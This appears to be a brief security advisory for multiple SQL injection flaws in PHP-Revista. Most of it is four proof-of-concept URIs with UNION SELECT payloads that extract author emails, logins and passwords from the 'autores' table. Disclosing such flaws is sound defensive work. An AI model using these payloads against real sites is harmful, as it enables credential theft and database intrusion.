|
PHP-Revista Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit this issue. The following proof-of-concept URIs are available: http://www.example.com/revista/revista/estilo/[STYLE]/busqueda.php?cadena='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /* http://www.example.com/revista/revista/estilo/[STYLE]/lista.php?email='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /* http://www.example.com/revista/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /* http://www.example.com/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 |
|
Privacy Statement |